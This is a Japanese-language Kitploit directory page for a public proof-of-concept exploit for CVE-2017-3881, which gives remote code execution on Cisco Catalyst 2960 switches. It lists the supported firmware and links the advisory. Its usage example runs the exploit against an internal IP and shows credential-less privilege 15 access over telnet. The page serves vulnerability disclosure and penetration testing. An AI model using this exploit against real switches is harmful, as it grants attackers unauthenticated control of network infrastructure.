Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cisco-rce — CVE-2017-3881 Cisco Catalyst リモートコード実行 PoC | Kitploit
ツール/GitHubGitHub/artkond/cisco-rce
組み込みシステムセキュリティエクスプロイトフレームワーク脆弱性分析エクスプロイトネットワークセキュリティペネトレーションテスト
GitHubartkond/cisco-rce

cisco-rce

CVE-2017-3881 Cisco Catalyst リモートコード実行 PoC

リポジトリを見る
213799年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2017-3881 Cisco IOS リモートコード実行

===================

このリポジトリには、Cisco Systems が2017年3月17日に公開したリモートコード実行の脆弱性を悪用するための Proof-Of-Concept コードが含まれています - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp

説明

エクスプロイトの解説はこちら - https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/

RCE エクスプロイトコードは Cisco Catalyst 2960 スイッチモデル向けです。このエクスプロイトはファームウェアに依存します。サポートされているファームウェアバージョンは2つです:

  • 12.2(55)SE1 C2960-LANBASEK9-M

  • 12.2(55)SE11 C2960-LANBASEK9-M

サービス拒否コードは metasploit の ruby モジュールとして利用できます。これは Cisco アドバイザリに記載されているほとんどのスイッチで動作するはずです(確認が必要です)。

使用例

root@kitploit:~
$ python c2960-lanbasek9-m-12.2.55.se11 192.168.88.10 --set
[+] Connection OK
[+] Recieved bytes from telnet service: '\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f'
[+] Sending cluster option
[+] Setting credless privilege 15 authentication
[+] All done
$ telnet 192.168.88.10
Trying 192.168.88.10...
Connected to 192.168.88.10.
Escape character is '^]'.

catalyst1#show priv
Current privilege level is 15

作者

Artem Kondratenko https://twitter.com/artkond

ツールをダウンロード